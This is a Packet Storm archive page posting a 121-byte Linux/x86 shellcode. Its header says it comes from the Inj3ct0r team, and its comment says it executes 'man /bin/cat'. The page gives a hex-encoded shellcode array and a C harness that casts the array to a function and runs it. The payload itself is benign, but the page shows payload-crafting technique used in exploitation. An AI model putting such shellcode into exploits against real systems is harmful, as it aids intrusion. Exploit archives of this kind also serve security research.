exploit the possibilities

Linux man /bin/cat Shellcode

Linux man /bin/cat Shellcode
Posted Sep 14, 2012
Authored by Dark-Puzzle

121 bytes small Linux/x86 man /bin/cat shellcode.

tags | x86, shellcode
systems | linux
SHA-256 | 1f23c312df1064018158e04828ddd8afd600f9b3bfa0d16a31f90d173ea332c3

Linux man /bin/cat Shellcode

Change Mirror Download
/*
# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# 0 _ __ __ __ 1
# 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
# 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
# 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
# 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
# 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
# 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
# 1 \ \____/ >> Exploit database separated by exploit 0
# 0 \/___/ type (local, remote, DoS, etc.) 1
# 1 1
# 0 [x] Official Website: http://www.1337day.com 0
# 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1
# 0 0
# 1 ========================================== 1
# 0 I'm Dark-Puzzle From Inj3ct0r TEAM 0
# 0 1
# 1 dark-puzzle[at]live[at]fr 0
# 0 ========================================== 1
# 1 White Hat 1
# 0 Independant Pentester 0
# 1 exploit coder/bug researcher 0
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
Shellcode By DarkPuzzle
Title : Linux/x86 Shellcode - "man /bin/cat" 121 bytes .
Author : Dark-Puzzle (Souhail Hammou)
Platform : Linux/x86
Gr33tz to : Inj3ct0rs Team - SecurityFocus - PacketstormSecurity - Exploit-db .
Usage ::Shellcode executes the command : man /bin/cat ( shows the user manual of /bin/cat)
to exit the manual press CTRL+C then write :wq
*/

char darkcode[] = "\xeb\x5a\x31\xc0\x31\xdb\x31\xd2\xb0\x04\xb3\x01\x59\xb2\x18\xcd\x80\xeb\x27\x5e\x31\xc0\x88\x46\x0c\x88\x46\x10\x89\x76\x11\x8d\x5e\x0d\x89\x5e\x15\x89\x46\x19\xb0\x0b\x89\xf3\x8d\x4e\x11\x8d\x56\x19\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xd4\xff\xff\xff\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x6d\x61\x6e\x23\x63\x61\x74\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\xe8\xa1\xff\xff\xff\x43\x6f\x64\x65\x64\x20\x42\x79\x20\x44\x61\x72\x6b\x2d\x50\x75\x7a\x7a\x6c\x65\x2f\x2a\x2a\x2f";
int main (int argc, char **argv)
{
int (*dark) ();
dark = (int (*) ()) darkcode;
(int) (*dark) ();

}
Login or Register to add favorites

File Archive:

May 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    0 Files
  • 2
    May 2nd
    15 Files
  • 3
    May 3rd
    19 Files
  • 4
    May 4th
    24 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    14 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    13 Files
  • 10
    May 10th
    7 Files
  • 11
    May 11th
    99 Files
  • 12
    May 12th
    45 Files
  • 13
    May 13th
    7 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    26 Files
  • 18
    May 18th
    4 Files
  • 19
    May 19th
    17 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close